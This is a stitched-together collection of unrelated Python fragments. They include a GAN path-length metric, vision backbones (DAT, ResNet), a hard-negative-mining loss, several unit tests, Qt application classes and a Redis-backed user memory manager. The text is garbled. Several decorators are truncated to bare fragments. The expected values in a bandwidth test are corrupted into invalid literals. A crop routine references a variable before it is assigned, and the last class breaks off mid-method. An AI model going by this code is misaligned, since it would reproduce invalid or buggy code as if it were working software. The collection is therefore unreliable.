        self.epsilon = epsilon
        self.use_dlatent = use_dlatent
        self.full_sampling = full_sampling
        self.crop = crop
        self.batch_size = self.prior_generator.batch_size
        if (lpips_model is None):
            warnings.warn(((('Using default LPIPS distance metric based on VGG 16. ' + 'This metric will only work on image data where values are in ') + 'the range [-1, 1], please specify an lpips module if you want ') + 'to use other kinds of data formats.'))
            lpips_model = lpips.LPIPS_VGG16(pixel_min=(- 1), pixel_max=1)
            if device_ids:
                lpips_model = torch.nn.DataParallel(lpips_model, device_ids=device_ids)
            lpips_size = (lpips_size or 256)
        self.lpips_model = lpips_model.eval().to(device)
        self.lpips_size = lpips_size

    def _scale_for_lpips(self, data):
        # Resize so the smaller spatial side equals lpips_size (if set).
        if (not self.lpips_size):
            return data
        scale_factor = (self.lpips_size / min(data.size()[2:]))
        if (scale_factor == 1):
            return data
        mode = 'nearest'
        if (scale_factor < 1):
            # Downscaling: area interpolation avoids aliasing.
            mode = 'area'
        return F.interpolate(data, scale_factor=scale_factor, mode=mode)

    def crop_data(self, data):
        """Crop data per self.crop (fractional <1 or absolute bounds per dim).

        NOTE(review): the two normalization branches below reference ``size``
        before it is bound (it is only assigned inside the later loop), so
        absolute (>= 1) crop values would raise NameError here -- confirm
        against upstream.
        """
        if (not self.crop):
            return data
        dim = (data.dim() - 2)
        if isinstance(self.crop, numbers.Number):
            self.crop = [self.crop]
        else:
            self.crop = list(self.crop)
        if (len(self.crop) == 1):
            self.crop = ([self.crop[0], ((1 if (self.crop[0] < 1) else size) - self.crop[0])] * dim)
        if (len(self.crop) == dim):
            crop = self.crop
            self.crop = []
            for value in crop:
                self.crop += [value, ((1 if (value < 1) else size) - value)]
        assert (len(self.crop) == (2 * dim)), (('Crop values has to be ' + 'a single value or a sequence of values of the same ') + 'size as number of dimensions of the data or twice of that.')
        pre_index = [Ellipsis]
        post_index = [slice(None, None, None) for _ in range(dim)]
        for i in range(0, (2 * dim), 2):
            j = (i // 2)
            size = data.size((2 + j))
            (crop_min, crop_max) = self.crop[i:(i + 2)]
            if (crop_max < 1):
                # Fractional bounds -> absolute pixel coordinates.
                (crop_min, crop_max) = ((crop_min * size), (crop_max * size))
            (crop_min, crop_max) = (max(0, int(crop_min)), min(size, int(crop_max)))
            dim_index = post_index.copy()
            dim_index[j] = slice(crop_min, crop_max, None)
            data = data[(pre_index + dim_index)]
        return data

    def prep_latents(self, latents):
        """Return latents duplicated into (z, z + epsilon) pairs.

        With full_sampling, consecutive half-batches are first interpolated
        at a random position (slerp in z space, lerp in w space).
        """
        if self.full_sampling:
            lerp = utils.slerp
            if self.use_dlatent:
                lerp = utils.lerp
            (latents_a, latents_b) = (latents[:self.batch_size], latents[self.batch_size:])
            latents = lerp(latents_a, latents_b, torch.rand(latents_a.size()[:(- 1)], dtype=latents_a.dtype, device=latents_a.device).unsqueeze((- 1)))
        return torch.cat([latents, (latents + self.epsilon)], dim=0)

    def __call__(self, *args, **kwargs):
        return self.evaluate(*args, **kwargs)

    def evaluate(self, verbose=True):
        """Run the metric over num_samples latents and return the mean PPL."""
        distances = []
        batch_size = self.batch_size
        if self.full_sampling:
            # Full sampling draws two latents per evaluated pair.
            batch_size = (2 * batch_size)
        if verbose:
            progress = utils.ProgressWriter(np.ceil((self.num_samples / self.batch_size)))
            progress.write('PPL: Evaluating metric...', step=False)
        for _ in range(0, self.num_samples, self.batch_size):
            # Fix the synthesis noise so paired samples differ only in latents.
            utils.unwrap_module(self.G_synthesis).static_noise()
            (latents, latent_labels) = self.prior_generator(batch_size=batch_size)
            if ((latent_labels is not None) and self.full_sampling):
                # Both latents of an interpolated pair must share a label.
                latent_labels = latent_labels.view(2, (- 1))[0].repeat(2)
            if self.use_dlatent:
                with torch.no_grad():
                    dlatents = self.G_mapping(latents=latents, labels=latent_labels)
                dlatents = self.prep_latents(dlatents)
            else:
                latents = self.prep_latents(latents)
                with torch.no_grad():
                    dlatents = self.G_mapping(latents=latents, labels=latent_labels)
            # Broadcast the dlatent to every synthesis layer.
            dlatents = dlatents.unsqueeze(1).repeat(1, len(utils.unwrap_module(self.G_synthesis)), 1)
            with torch.no_grad():
                output = self.G_synthesis(dlatents)
            output = self.crop_data(output)
            output = self._scale_for_lpips(output)
            # First half: z images; second half: z + epsilon images.
            (output_a, output_b) = (output[:self.batch_size], output[self.batch_size:])
            with torch.no_grad():
                dist = self.lpips_model(output_a, output_b)
            distances.append((dist.cpu() * (1 / (self.epsilon ** 2))))
            if verbose:
                progress.step()
        if verbose:
            progress.write('PPL: Evaluated!', step=False)
            progress.close()
        distances = torch.cat(distances, dim=0).numpy()
        # Trim outliers outside the [1st, 99th] percentile band before averaging.
        # NOTE(review): np.percentile's ``interpolation=`` kwarg was renamed to
        # ``method=`` in NumPy 1.22 -- may need updating for newer NumPy.
        lo = np.percentile(distances, 1, interpolation='lower')
        hi = np.percentile(distances, 99, interpolation='higher')
        filtered_distances = np.extract(np.logical_and((lo <= distances), (distances <= hi)), distances)
        return float(np.mean(filtered_distances))
class TestWithRootDir(TestOSRelease):
    """Re-run the TestOSRelease suite against a distro tree via root_dir."""

    def setup_method(self, test_method: FunctionType) -> None:
        # Test names encode the distro as the second underscore-separated token.
        distro_name = test_method.__name__.split('_')[1]
        self.distro = distro.LinuxDistribution(
            include_lsb=False,
            include_uname=False,
            include_oslevel=False,
            os_release_file='',
            distro_release_file='path-to-non-existing-file',
            root_dir=os.path.join(DISTROS_DIR, distro_name),
        )
def correct_pad(kernel_size: Union[(int, Tuple)], adjust: bool=True):
    """Compute explicit (left, right, top, bottom) padding for a kernel.

    An int kernel_size is treated as square. With ``adjust`` the left/top
    sides are shrunk by one, matching "same" padding for strided convs.
    """
    if isinstance(kernel_size, int):
        kernel_size = (kernel_size, kernel_size)
    pad_h, pad_w = kernel_size[0] // 2, kernel_size[1] // 2
    if adjust:
        return (pad_w - 1, pad_w, pad_h - 1, pad_h)
    return (pad_w, pad_w, pad_h, pad_h)
class HelpApp(cmd2.Cmd):
    """Test app exercising cmd2 help: help_* methods, docstrings, and
    undocumented commands."""

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

    def do_squat(self, arg):
        # Help text comes from help_squat() below, not from a docstring.
        pass

    def help_squat(self):
        self.stdout.write('This command does diddly squat...\n')

    def do_edit(self, arg):
        # Shadows cmd2's built-in edit command.
        pass

    def do_undoc(self, arg):
        # Deliberately undocumented: no docstring and no help_undoc().
        pass

    def do_multiline_docstr(self, arg):
        # NOTE(review): the name suggests this once carried a multi-line
        # docstring that was lost in extraction -- confirm upstream.
        pass
class LE(LogicalComparison):
    """Elementwise ``x <= y`` comparison Op."""

    identity = False
    commutative = False
    associative = False
    # Maps to numpy.less_equal: 2 inputs, 1 output.
    nfunc_spec = ('less_equal', 2, 1)

    def impl(self, x, y):
        # Python-side implementation; delegates to NumPy for broadcasting.
        return np.less_equal(x, y)

    def c_code(self, node, name, inputs, outputs, sub):
        (x, y) = inputs
        (z,) = outputs
        if (node.inputs[0].type in complex_types):
            # Ordering comparisons are undefined for complex numbers.
            raise NotImplementedError()
        return f'{z} = ({x} <= {y});'
# NOTE(review): ".parametrize(...)" looks like a "@pytest.mark.parametrize"
# decorator whose prefix was lost in extraction -- confirm upstream.
.parametrize('data_fcn, plot_fcn, mimo', [(control.step_response, control.time_response_plot, True), (control.step_response, control.TimeResponseData.plot, True), (control.frequency_response, control.FrequencyResponseData.plot, True), (control.frequency_response, control.bode, True), (control.frequency_response, control.bode_plot, True), (control.nyquist_response, control.nyquist_plot, False)])
def test_response_plot_kwargs(data_fcn, plot_fcn, mimo):
    """Unknown keyword arguments must raise for response and plot calls."""
    if mimo:
        response = data_fcn(control.rss(4, 2, 2))
    else:
        response = data_fcn(control.rss(4, 1, 1))
    # Unknown keywords passed to the response factory should raise.
    with pytest.raises((AttributeError, TypeError), match='(has no property|unexpected keyword|unrecognized keyword)'):
        data_fcn(control.rss(2, 1, 1), unknown=None)
    # A plain plot call must work, but unknown keywords should raise --
    # checked through both the free-function and method calling conventions.
    plot_fcn(response)
    with pytest.raises(AttributeError, match='(has no property|unexpected keyword)'):
        plot_fcn(response, unknown=None)
    response.plot()
    with pytest.raises(AttributeError, match='(has no property|unexpected keyword)'):
        response.plot(unknown=None)
class DataArguments():
    """Command-line arguments describing PMC-VQA data locations and format.

    NOTE(review): the ``field(...)`` defaults only take effect under a
    @dataclass decorator, which appears to have been stripped in extraction
    -- confirm against the original file.
    """

    # Whether to run in blank (imageless) mode.
    is_blank: Optional[bool] = field(default=False)
    # Square resolution images are resized to.
    image_res: Optional[int] = field(default=512)
    img_root_dir: str = field(default='../../PMC-VQA/images/', metadata={'help': 'Path to the training data.'})
    Train_csv_path: str = field(default='../../PMC-VQA/train.csv', metadata={'help': 'Path to the training data.'})
    Test_csv_path: str = field(default='../../PMC-VQA/test.csv', metadata={'help': 'Path to the training data.'})
def test_SumScaler_no_change_original_dm(decision_matrix):
    """transform() must return a new matrix and leave the input untouched."""
    dm = decision_matrix(
        seed=42,
        min_alternatives=10,
        max_alternatives=10,
        min_criteria=20,
        max_criteria=20,
        min_objectives_proportion=0.5,
    )
    snapshot = dm.copy()
    transformed = SumScaler(target='both').transform(dm)
    # Original unchanged, result differs, and the copy is a distinct object.
    assert dm.equals(snapshot) and (not transformed.equals(snapshot)) and (dm is not snapshot)
class ThresholdReducer(BaseReducer):
    """Reducer that averages only losses inside the open interval (low, high).

    At least one bound must be given; elements outside the interval are
    dropped before taking the mean. Optionally records filter statistics.
    """

    def __init__(self, low=None, high=None, **kwargs):
        super().__init__(**kwargs)
        assert ((low is not None) or (high is not None)), 'At least one of low or high must be specified'
        self.low = low
        self.high = high
        if (self.low is not None):
            self.add_to_recordable_attributes(list_of_names=['low'], is_stat=False)
        if (self.high is not None):
            self.add_to_recordable_attributes(list_of_names=['high'], is_stat=False)

    def element_reduction(self, losses, loss_indices, embeddings, labels):
        return self.element_reduction_helper(losses, embeddings, 'elements')

    def pos_pair_reduction(self, losses, loss_indices, embeddings, labels):
        return self.element_reduction_helper(losses, embeddings, 'pos_pairs')

    def neg_pair_reduction(self, losses, loss_indices, embeddings, labels):
        return self.element_reduction_helper(losses, embeddings, 'neg_pairs')

    def triplet_reduction(self, losses, loss_indices, embeddings, labels):
        return self.element_reduction_helper(losses, embeddings, 'triplets')

    def element_reduction_helper(self, losses, embeddings, attr_name):
        # A missing bound contributes a scalar True, which broadcasts in the
        # `&` below (bool & BoolTensor -> BoolTensor).
        low_condition = ((losses > self.low) if (self.low is not None) else True)
        high_condition = ((losses < self.high) if (self.high is not None) else True)
        threshold_condition = (low_condition & high_condition)
        num_past_filter = torch.sum(threshold_condition)
        if (num_past_filter >= 1):
            loss = torch.mean(losses[threshold_condition])
        else:
            # Nothing survived the filter: return a zero loss tied to the graph.
            loss = self.zero_loss(embeddings)
        self.set_stats(low_condition, high_condition, num_past_filter, attr_name)
        return loss

    def set_stats(self, low_condition, high_condition, num_past_filter, attr_name):
        """Record how many elements passed each bound (stats mode only)."""
        if self.collect_stats:
            curr_attr_name = '{}_past_filter'.format(attr_name)
            self.add_to_recordable_attributes(name=curr_attr_name, is_stat=True)
            setattr(self, curr_attr_name, num_past_filter.item())
            with torch.no_grad():
                if (self.low is not None):
                    curr_attr_name = '{}_above_low'.format(attr_name)
                    self.add_to_recordable_attributes(name=curr_attr_name, is_stat=True)
                    setattr(self, curr_attr_name, torch.sum(low_condition).item())
                if (self.high is not None):
                    curr_attr_name = '{}_below_high'.format(attr_name)
                    self.add_to_recordable_attributes(name=curr_attr_name, is_stat=True)
                    setattr(self, curr_attr_name, torch.sum(high_condition).item())
def read_minimal_logic_db(data: (dict | None)) -> (MinimalLogicData | None):
    """Deserialize MinimalLogicData from its dict form; None passes through."""
    if data is None:
        return None
    excluded_items = [
        IndexWithReason(entry['name'], entry.get('when_shuffled'))
        for entry in data['items_to_exclude']
    ]
    item_amounts = {entry['name']: entry['value'] for entry in data['custom_item_amount']}
    excluded_events = [
        IndexWithReason(entry['name'], entry.get('reason'))
        for entry in data['events_to_exclude']
    ]
    return MinimalLogicData(
        items_to_exclude=excluded_items,
        custom_item_amount=item_amounts,
        events_to_exclude=excluded_events,
        description=data['description'],
    )
class DAT(nn.Module):
    """Deformable Attention Transformer (DAT) backbone.

    Four TransformerStage stages with inter-stage downsampling projections;
    ``forward`` returns the feature maps of all four stages.

    NOTE(review): the bare "_grad()" line before load_pretrained and the
    ".ignore" lines before the no_weight_decay helpers look like mangled
    "@torch.no_grad()" / "@torch.jit.ignore" decorators -- confirm upstream.
    """

    def __init__(self, img_size=224, patch_size=4, num_classes=1000, expansion=4, dim_stem=96, dims=[96, 192, 384, 768], depths=[2, 2, 18, 2], heads=[3, 6, 12, 24], window_sizes=[7, 7, 7, 7], drop_rate=0.0, attn_drop_rate=0.0, drop_path_rate=0.3, strides=[(- 1), (- 1), 1, 1], offset_range_factor=[(- 1), (- 1), 2, 2], stage_spec=[['L', 'S'], ['L', 'S'], ['L', 'D', 'L', 'D', 'L', 'D', 'L', 'D', 'L', 'D', 'L', 'D', 'L', 'D', 'L', 'D', 'L', 'D'], ['L', 'D']], groups=[(- 1), (- 1), 3, 6], use_pes=[False, False, True, True], dwc_pes=[False, False, False, False], sr_ratios=[(- 1), (- 1), (- 1), (- 1)], fixed_pes=[False, False, False, False], no_offs=[False, False, False, False], ns_per_pts=[4, 4, 4, 4], use_dwc_mlps=[False, False, False, False], use_conv_patches=False, **kwargs):
        super().__init__()
        # Patch embedding: overlapping 7x7 conv if use_conv_patches, else a
        # non-overlapping patch_size x patch_size conv.
        self.patch_proj = (nn.Sequential(nn.Conv2d(3, dim_stem, 7, patch_size, 3), LayerNormProxy(dim_stem)) if use_conv_patches else nn.Sequential(nn.Conv2d(3, dim_stem, patch_size, patch_size, 0), LayerNormProxy(dim_stem)))
        img_size = (img_size // patch_size)
        # Stochastic-depth rates increase linearly over all blocks.
        dpr = [x.item() for x in torch.linspace(0, drop_path_rate, sum(depths))]
        self.stages = nn.ModuleList()
        for i in range(4):
            dim1 = (dim_stem if (i == 0) else (dims[(i - 1)] * 2))
            dim2 = dims[i]
            self.stages.append(TransformerStage(img_size, window_sizes[i], ns_per_pts[i], dim1, dim2, depths[i], stage_spec[i], groups[i], use_pes[i], sr_ratios[i], heads[i], strides[i], offset_range_factor[i], i, dwc_pes[i], no_offs[i], fixed_pes[i], attn_drop_rate, drop_rate, expansion, drop_rate, dpr[sum(depths[:i]):sum(depths[:(i + 1)])], use_dwc_mlps[i]))
            # Spatial resolution halves after each stage.
            img_size = (img_size // 2)
        self.down_projs = nn.ModuleList()
        for i in range(3):
            self.down_projs.append((nn.Sequential(nn.Conv2d(dims[i], dims[(i + 1)], 3, 2, 1, bias=False), LayerNormProxy(dims[(i + 1)])) if use_conv_patches else nn.Sequential(nn.Conv2d(dims[i], dims[(i + 1)], 2, 2, 0, bias=False), LayerNormProxy(dims[(i + 1)]))))
        self.cls_norm = LayerNormProxy(dims[(- 1)])
        self.cls_head = nn.Linear(dims[(- 1)], num_classes)
        self.reset_parameters()

    def reset_parameters(self):
        # NOTE(review): parameters() yields tensors, so the isinstance check
        # against nn.Linear/nn.Conv2d can never match -- presumably
        # self.modules() was intended; confirm upstream.
        for m in self.parameters():
            if isinstance(m, (nn.Linear, nn.Conv2d)):
                nn.init.kaiming_normal_(m.weight)
                nn.init.zeros_(m.bias)

    _grad()
    def load_pretrained(self, state_dict):
        """Load a pretrained state dict, resizing positional tables as needed."""
        new_state_dict = {}
        for (state_key, state_value) in state_dict.items():
            # Walk the attribute path to the matching parameter on self.
            keys = state_key.split('.')
            m = self
            for key in keys:
                if key.isdigit():
                    m = m[int(key)]
                else:
                    m = getattr(m, key)
            if (m.shape == state_value.shape):
                new_state_dict[state_key] = state_value
            else:
                # Shape mismatch: keep our own index buffers, and resize the
                # relative-position / rpe tables bicubically.
                if ('relative_position_index' in keys):
                    new_state_dict[state_key] = m.data
                if ('q_grid' in keys):
                    new_state_dict[state_key] = m.data
                if ('reference' in keys):
                    new_state_dict[state_key] = m.data
                if ('relative_position_bias_table' in keys):
                    (n, c) = state_value.size()
                    l = int(math.sqrt(n))
                    assert (n == (l ** 2))
                    L = int(math.sqrt(m.shape[0]))
                    pre_interp = state_value.reshape(1, l, l, c).permute(0, 3, 1, 2)
                    post_interp = F.interpolate(pre_interp, (L, L), mode='bicubic')
                    new_state_dict[state_key] = post_interp.reshape(c, (L ** 2)).permute(1, 0)
                if ('rpe_table' in keys):
                    (c, h, w) = state_value.size()
                    (C, H, W) = m.data.size()
                    pre_interp = state_value.unsqueeze(0)
                    post_interp = F.interpolate(pre_interp, (H, W), mode='bicubic')
                    new_state_dict[state_key] = post_interp.squeeze(0)
        self.load_state_dict(new_state_dict, strict=False)

    .ignore
    def no_weight_decay(self):
        # Parameter names excluded from weight decay.
        return {'absolute_pos_embed'}

    .ignore
    def no_weight_decay_keywords(self):
        # Keyword patterns excluded from weight decay.
        return {'relative_position_bias_table', 'rpe_table'}

    def forward(self, x):
        """Return the list of feature maps produced by the four stages."""
        x = self.patch_proj(x)
        positions = []
        references = []
        outs = []
        for i in range(4):
            (x, pos, ref) = self.stages[i](x)
            outs.append(x)
            if (i < 3):
                # Downsample between stages (not after the last one).
                x = self.down_projs[i](x)
            positions.append(pos)
            references.append(ref)
        return outs
class ResNet(nn.Module):
    """ResNet-12 style feature extractor (4 stages, globally average pooled).

    Returns a flat (N, C) feature vector per input image.
    """

    def __init__(self, block=BasicBlock, keep_prob=1.0, avg_pool=False, drop_rate=0.0, dropblock_size=5):
        # inplanes starts at the input channel count (RGB) and is advanced
        # by _make_layer as stages are built.
        self.inplanes = 3
        super(ResNet, self).__init__()
        self.layer1 = self._make_layer(block, 64, stride=2, drop_rate=drop_rate)
        self.layer2 = self._make_layer(block, 160, stride=2, drop_rate=drop_rate)
        # DropBlock regularization only on the two deepest stages.
        self.layer3 = self._make_layer(block, 320, stride=2, drop_rate=drop_rate, drop_block=True, block_size=dropblock_size)
        self.layer4 = self._make_layer(block, 640, stride=2, drop_rate=drop_rate, drop_block=True, block_size=dropblock_size)
        if avg_pool:
            # NOTE(review): forward() uses adaptive_avg_pool2d directly, so
            # self.avgpool and self.dropout appear unused here -- confirm.
            self.avgpool = nn.AvgPool2d(5, stride=1)
        self.keep_prob = keep_prob
        self.keep_avg_pool = avg_pool
        self.dropout = nn.Dropout(p=(1 - self.keep_prob), inplace=False)
        self.drop_rate = drop_rate
        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='leaky_relu')
            elif isinstance(m, nn.BatchNorm2d):
                nn.init.constant_(m.weight, 1)
                nn.init.constant_(m.bias, 0)

    def _make_layer(self, block, planes, stride=1, drop_rate=0.0, drop_block=False, block_size=1):
        """Build one stage consisting of a single *block*."""
        downsample = None
        if ((stride != 1) or (self.inplanes != (planes * block.expansion))):
            # 1x1 projection to match the residual branch's channel count.
            downsample = nn.Sequential(nn.Conv2d(self.inplanes, (planes * block.expansion), kernel_size=1, stride=1, bias=False), nn.BatchNorm2d((planes * block.expansion)))
        layers = []
        layers.append(block(self.inplanes, planes, stride, downsample, drop_rate, drop_block, block_size))
        self.inplanes = (planes * block.expansion)
        return nn.Sequential(*layers)

    def forward(self, x):
        x = self.layer1(x)
        x = self.layer2(x)
        x = self.layer3(x)
        x = self.layer4(x)
        # Global average pool down to a flat (N, C) feature vector.
        x = F.adaptive_avg_pool2d(x, 1).squeeze((- 1)).squeeze((- 1))
        return x
def test_building_scenariooutline_scenarios(mocker):
    """build_scenarios() expands each Examples row into an ExampleScenario,
    substituting <placeholders> in the step sentences with the row values."""
    scenario_outline = ScenarioOutline(1, 'Scenario Outline', 'Examples', 'I am a Scenario Outline', 'foo.feature', 1, parent=None, tags=None, preconditions=None, background=None)
    # Two steps with placeholders, one literal step.
    scenario_outline.steps.extend([mocker.MagicMock(sentence='Given I have <foo>', path='foo.feature'), mocker.MagicMock(sentence='And I have <bar>', path='foo.feature'), mocker.MagicMock(sentence='When I add those', path='foo.feature')])
    scenario_outline.examples_header = ['foo', 'bar']
    scenario_outline.examples = [ScenarioOutline.Example(['1', '2'], 'foo.feature', 1), ScenarioOutline.Example(['3', '4'], 'foo.feature', 2)]
    scenario_outline.build_scenarios()
    # One generated scenario per example row, named after the row index.
    assert (len(scenario_outline.scenarios) == 2)
    assert all((isinstance(x, ExampleScenario) for x in scenario_outline.scenarios))
    assert (scenario_outline.scenarios[0].sentence == 'I am a Scenario Outline - row 0')
    assert (scenario_outline.scenarios[1].sentence == 'I am a Scenario Outline - row 1')
    # Row values substituted into the placeholder steps; literal step kept.
    assert (scenario_outline.scenarios[0].steps[0].sentence == 'Given I have 1')
    assert (scenario_outline.scenarios[0].steps[1].sentence == 'And I have 2')
    assert (scenario_outline.scenarios[0].steps[2].sentence == 'When I add those')
    assert (scenario_outline.scenarios[1].steps[0].sentence == 'Given I have 3')
    assert (scenario_outline.scenarios[1].steps[1].sentence == 'And I have 4')
    assert (scenario_outline.scenarios[1].steps[2].sentence == 'When I add those')
class OHNMLoss(nn.Module):
    """Online Hard Negative Mining BCE-with-logits loss.

    Keeps all positive examples and only the hardest (highest-logit)
    negatives, at a ratio of ``neg_ratio`` negatives per positive.
    """

    def __init__(self, neg_ratio=3.0):
        super(OHNMLoss, self).__init__()
        # Number of mined negatives per positive example.
        self.neg_ratio = neg_ratio

    def forward(self, input, target):
        """Compute the mined loss.

        Args:
            input: raw logits, any shape.
            target: same shape as ``input``; >0 marks positives, ==0 negatives.
        """
        pos_logits = input[(target > 0)]
        pos_labels = target[(target > 0)]
        neg_logits = input[(target == 0)]
        neg_labels = target[(target == 0)]
        pos_num = pos_logits.numel()
        # Fix: cap the mined-negative count by the negatives actually
        # available; otherwise topk() raises when
        # pos_num * neg_ratio > neg_logits.numel().
        neg_num = min(int((pos_num * self.neg_ratio)), neg_logits.numel())
        # topk selects the hardest negatives (largest logits).
        (neg_logits, neg_indices) = neg_logits.topk(neg_num)
        neg_labels = neg_labels[neg_indices]
        loss = F.binary_cross_entropy_with_logits(torch.cat([pos_logits, neg_logits]), torch.cat([pos_labels, neg_labels]), reduction='mean')
        return loss
class TestKernelBWLookup(unittest.TestCase):
    """Tests for kernel_bw_lookup() with the FUSED_UVM_CACHING kernel.

    NOTE(review): several expected float literals below are corrupted
    (bare "." tokens in ".96448, ., ., .0352, .6128") -- apparently mangled
    during extraction. As written these lines are not valid Python; the
    original values must be restored from the upstream file.
    """

    def test_uvm_caching_bw(self) -> None:
        # Bandwidth should vary with the caching ratio (DDR <-> HBM blend).
        compute_device: str = 'cuda'
        computer_kernel: str = EmbeddingComputeKernel.FUSED_UVM_CACHING.value
        caching_ratios: List[float] = [0, 0.25, 0.5, 0.75, 1]
        uvm_caching_bw: list[Optional[float]] = [kernel_bw_lookup(compute_device, computer_kernel, HBM_MEM_BW, DDR_MEM_BW, caching_ratio) for caching_ratio in caching_ratios]
        expected_uvm_caching_bw: List[float] = [.96448, ., ., .0352, .6128]
        self.assertEqual(expected_uvm_caching_bw, uvm_caching_bw)

    def test_uvm_caching_bw_with_prefetch_pipeline(self) -> None:
        # With the prefetch pipeline enabled the caching ratio should not
        # affect the reported bandwidth.
        compute_device: str = 'cuda'
        computer_kernel: str = EmbeddingComputeKernel.FUSED_UVM_CACHING.value
        prefetch_pipeline: bool = True
        caching_ratios: List[float] = [0, 0.25, 0.5, 0.75, 1]
        uvm_caching_bw: list[Optional[float]] = [kernel_bw_lookup(compute_device, computer_kernel, HBM_MEM_BW, DDR_MEM_BW, caching_ratio, prefetch_pipeline) for caching_ratio in caching_ratios]
        expected_uvm_caching_bw: List[float] = [.128, .128, .128, .128, .128]
        self.assertEqual(expected_uvm_caching_bw, uvm_caching_bw)
def get_model_test_files():
    """Collect test_modeling* files under PATH_TO_TESTS, minus a skip list.

    Returned paths are relative to PATH_TO_TESTS; one directory level of
    nesting is searched.
    """
    _ignore_files = [
        'test_modeling_common',
        'test_modeling_encoder_decoder',
        'test_modeling_flax_encoder_decoder',
        'test_modeling_flax_speech_encoder_decoder',
        'test_modeling_marian',
        'test_modeling_tf_common',
        'test_modeling_tf_encoder_decoder',
    ]
    test_files = []
    for entry in os.listdir(PATH_TO_TESTS):
        entry_path = os.path.join(PATH_TO_TESTS, entry)
        if os.path.isdir(entry_path):
            candidates = [os.path.join(entry, name) for name in os.listdir(entry_path)]
        else:
            candidates = [entry]
        for candidate in candidates:
            if not os.path.isfile(os.path.join(PATH_TO_TESTS, candidate)):
                continue
            if 'test_modeling' not in candidate:
                continue
            if os.path.splitext(candidate)[0] in _ignore_files:
                continue
            test_files.append(candidate)
    return test_files
class Application(QApplication):
    """Main application object, wiring window signals and global app events.

    NOTE(review): the bare "(mainwindow.MainWindow)" / "(QObject)" lines
    before the slot methods look like "@pyqtSlot(...)" decorators whose "@"
    prefix was lost in extraction -- confirm upstream.
    """

    # Emitted when a new main window is created / is closing.
    new_window = pyqtSignal(mainwindow.MainWindow)
    window_closing = pyqtSignal(mainwindow.MainWindow)

    def __init__(self, args):
        self._last_focus_object = None
        qt_args = qtargs.qt_args(args)
        log.init.debug('Commandline args: {}'.format(sys.argv[1:]))
        log.init.debug('Parsed: {}'.format(args))
        log.init.debug('Qt arguments: {}'.format(qt_args[1:]))
        super().__init__(qt_args)
        objects.args = args
        log.init.debug('Initializing application...')
        self.launch_time = datetime.datetime.now()
        self.focusObjectChanged.connect(self.on_focus_object_changed)
        if machinery.IS_QT5:
            # High-DPI pixmaps are on by default in Qt 6; only Qt 5 needs this.
            self.setAttribute(Qt.ApplicationAttribute.AA_UseHighDpiPixmaps, True)
        self.new_window.connect(self._on_new_window)

    (mainwindow.MainWindow)
    def _on_new_window(self, window):
        # Re-emit window_closing when the new window's browser shuts down.
        window.tabbed_browser.shutting_down.connect(functools.partial(self.window_closing.emit, window))

    (QObject)
    def on_focus_object_changed(self, obj):
        output = qtutils.qobj_repr(obj)
        # Only log when the focused object actually changed.
        if (self._last_focus_object != output):
            log.misc.debug('Focus object changed: {}'.format(output))
        self._last_focus_object = output

    def event(self, e):
        """Handle FileOpen events (e.g. macOS open-with); defer the rest to Qt."""
        if (e.type() != QEvent.Type.FileOpen):
            return super().event(e)
        url = e.url()
        if url.isValid():
            open_url(url, no_raise=True)
        else:
            message.error('Invalid URL: {}'.format(url.errorString()))
        return True

    def __repr__(self):
        return utils.get_repr(self)
class UserMemoryManager():
    """Per-user key/value pool stored either in-process or in Redis.

    Backend LOCAL keeps a plain dict keyed by user id; backend DATABASE uses
    a Redis client with keys of the form "<name>:<user_id>" and JSON values.
    """

    def __init__(self, name: str=None, backend: str=LOCAL, memory_pool: Dict=None):
        self.backend = backend
        self.name = name
        if (self.backend == LOCAL):
            if (memory_pool is None):
                memory_pool = {}
            self.memory_pool = memory_pool
        elif (self.backend == DATABASE):
            # Storage clients need an application context to be constructed.
            with app.app_context():
                self.redis_client = get_running_time_storage()
                self.db_client = get_user_conversation_storage()
        else:
            raise ValueError('Unknown backend option: {}'.format(self.backend))

    def get_pool_info_with_id(self, user_id: str, default_value: Union[(List, Dict)]) -> Any:
        """Return the stored info for *user_id*, or *default_value* if absent."""
        if (self.backend == LOCAL):
            pool = self.memory_pool
            if (user_id in pool):
                return pool[user_id]
            else:
                return default_value
        elif (self.backend == DATABASE):
            memory_pool_name = f'{self.name}:{user_id}'
            if self.redis_client.exists(memory_pool_name):
                info = json.loads(self.redis_client.get(memory_pool_name))
            else:
                try:
                    if (self.name == 'api_key_pool'):
                        info = default_value
                    else:
                        # NOTE(review): this NotImplementedError is raised
                        # inside the try and immediately swallowed by the
                        # except below, which logs and falls back to
                        # default_value -- confirm whether it should propagate.
                        raise NotImplementedError(f'Currently only support message pool in database, not {self.name}')
                except Exception as e:
                    logger.bind(user_id=user_id, msg_head='Cache miss but not in database').warning('Failed to get pool info from database: {}'.format(e))
                    info = default_value
            return info

    def set_pool_info_with_id(self, user_id: str, info: Any) -> None:
        """Store *info* for *user_id*."""
        if (self.backend == LOCAL):
            pool = self.memory_pool
            # NOTE(review): in LOCAL mode an existing entry is never
            # overwritten -- confirm this is the intended "set" semantics.
            if (user_id not in pool):
                pool[user_id] = info
        elif (self.backend == DATABASE):
            memory_pool_name = f'{self.name}:{user_id}'
            self.redis_client.set(memory_pool_name, json.dumps(info))

    def __iter__(self):
        # Yields (user_id, info) pairs; only supported for the LOCAL backend.
        if (self.backend == LOCAL):
            for (user_id, info) in self.memory_pool.items():
                (yield (user_id, info))
        elif (self.backend == DATABASE):
            raise NotImplementedError('Currently not support UserMemoryManager iteration in database mode.')
class Window(QWidget):
    """Address-book demo driven by a QDataWidgetMapper over a 5x3 model."""

    def __init__(self, parent=None):
        super(Window, self).__init__(parent)
        self.setupModel()

        # Editor widgets with mnemonic-labelled buddies.
        name_label = QLabel('Na&me:')
        name_edit = QLineEdit()
        address_label = QLabel('&Address:')
        address_edit = QTextEdit()
        age_label = QLabel('A&ge (in years):')
        age_spin_box = QSpinBox()
        self.nextButton = QPushButton('&Next')
        self.previousButton = QPushButton('&Previous')
        name_label.setBuddy(name_edit)
        address_label.setBuddy(address_edit)
        age_label.setBuddy(age_spin_box)

        # Map each editor onto one model column.
        self.mapper = QDataWidgetMapper(self)
        self.mapper.setModel(self.model)
        self.mapper.addMapping(name_edit, 0)
        self.mapper.addMapping(address_edit, 1)
        self.mapper.addMapping(age_spin_box, 2)

        self.previousButton.clicked.connect(self.mapper.toPrevious)
        self.nextButton.clicked.connect(self.mapper.toNext)
        self.mapper.currentIndexChanged.connect(self.updateButtons)

        # Table-driven grid placement: (widget, row, col, rowSpan, colSpan).
